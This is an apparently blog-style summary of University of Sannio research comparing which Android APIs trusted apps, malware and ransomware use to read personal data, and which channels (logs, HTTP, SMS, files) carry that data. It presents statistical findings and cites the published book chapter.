di Corrado Aaron Visaggio
Malicious Apps steal our data, of course, but trusted apps use to exfiltrate some personal and sensitive information from our devices, too.
At the ISWAT LAB, the CyberSecurity Laboratory of the Department of Engineering of the University of Sannio, carried out an analysis on 1,000 very popular trusted apps, and 4,593 malware apps gathered from the Drebin project’s dataset, and 672 samples of ransomware, taken from here . All the trusted apps were verified with VIRUSTOTAL .
We considered in the study the following involved methods, which take sensitive information:
- getDeviceId: it returns the unique device ID, for example, the IMEI for GSM and the MEID or ESN for CDMA phones;
- getLongitude: gets the longitude, in degrees;
- getLatitude: gets the latitude, in degrees;
- getCountry: it returns the country/region code for this locale, which should either be an empty string;
- getLastKnownLocation: it returns a Location indicating the data from the last known location obtained from the given provider;
- getSubscriberId: it returns the unique subscriber ID, for example, the IMSI for a GSM phone;
- getSimSerialNumber: it returns the serial number of the SIM, if applicable;
- getInstalledPackages: it returns a List of all the packages that are installed on the device;
- getInstalledApplications: it returns a List of all the application packages that are installed on the device;
- getLine1Number: it returns the phone number string;
- getCid:this method returns the cell tower location;
- getLac: it returns the Location Area Code (LAC).
The destination of exfiltrations that we intercepted are the following:
- Log: this category represents the Android API for creating logs and sending them outside the device. This category can be used to debug the application but also by malware writers to gather information. Error, warning and info logs are always kept. Malware writers are typically interested by the info logs of the application;
- HTTP: this category represents the URL Connection. It is the preferred method to write personal information into a socket used by malware. The HTTP channel is usually used to communicate with a Command andControl server, to send the personal information to attackers and/or to third-party servers, but also to download at runtime the malicious payload;
- SharedPreferences: Android provides many ways for storing the data of an application.One of this way is Shared Preferences. Shared Preferences permits to save and retrievedata in the form of (key,value) pair. Shared Preferences are stored as a file in the file system of the device. They are, by default, stored within the app’s data directory, and only the UID associated to the specific running application have the permissions to access them. The class belonging to this category is SharedPreferences;
- File: this category represents the storage on a file. Android uses a file system that is similar to disk-based file systems on other platforms. All the Android devices have two file storage areas: “internal” and “external” storage. These names come from the early days of Android, when most devices offered built-in non-volatile memory (internal storage), plus a removable storage medium such as a micro SD card (external storage). The main difference between internal and external storage is that the second one is world-readable, so files saved here may be read outside of the owner’s control, while, by using the internal one, files saved are accessible only by the app itself;
- Media: this category is referred to all the media generated by the application, for instance the onPictureTaken() method from PictureCallback class, that is called when an image is available after a picture is taken;
- SMS: SMSs are used by malware to send messages to premium rate numbers without the user’s involvement. Malware also captures the user’s banking information such as account number and password. Malware uses also SMSs in order to communicate with C&C server and/or to send SMSs with the malicious links to propagate the infection.
In the following figure we report the overall occurrences of the exfiltration methods for the three classes of analyzed apps (ransomware, malware, and trusted).
Ransomware mainly extracts the DeviceID and the phone number, and in fewer cases information about the geographical location of the device.
The other kinds of malware exfiltrate mainly the DeviceID, the identifier of the subscriber, the SIM Serial Number, and the phone number. A smaller number of occurrences regard the exfiltration of information about the geographical location of the device.
Notice that both the ransomware and the malware aims at obtain personal identifiable information from the data exfiltration.
It is interesting that the trusted apps use to obtain sensitive information from the device, too, which is: the DeviceId, and the geographical location, which is enough to track physically the device.
In the following figure we report the overall occurrences of the exfiltration channels for the three classes of analyzed apps (ransomware, malware, and trusted).
The favorite exfiltration channels for the ransomware and malware are HTTP, and SharedPreferenced, while SMS are scarcely used in ransomware, but are pretty common among malware.
Trusted apps tend to use mainly the Log instruments to record exfiltrated data, while as second preferred channel we found the HTTP; they make a very light use of SharedPreferences and File. Trusted apps do not make use of SMS.
The details of this study can be found in “Data Leakage in Mobile Malware: the what, the why and the how.”, published as chapter in the book “Intrusion Detection and Prevention for Mobile Ecosystems” (Taylor and Francis publisher), edited by George Kambourakis, Asaf Shabtai, Konstantinos Kolias, and Dimitrios Damopoulos. The authors of this book chapter are: Aaron Visaggio, Gerardo Canfora, Francesco Mercaldo, and Gigi Gentile.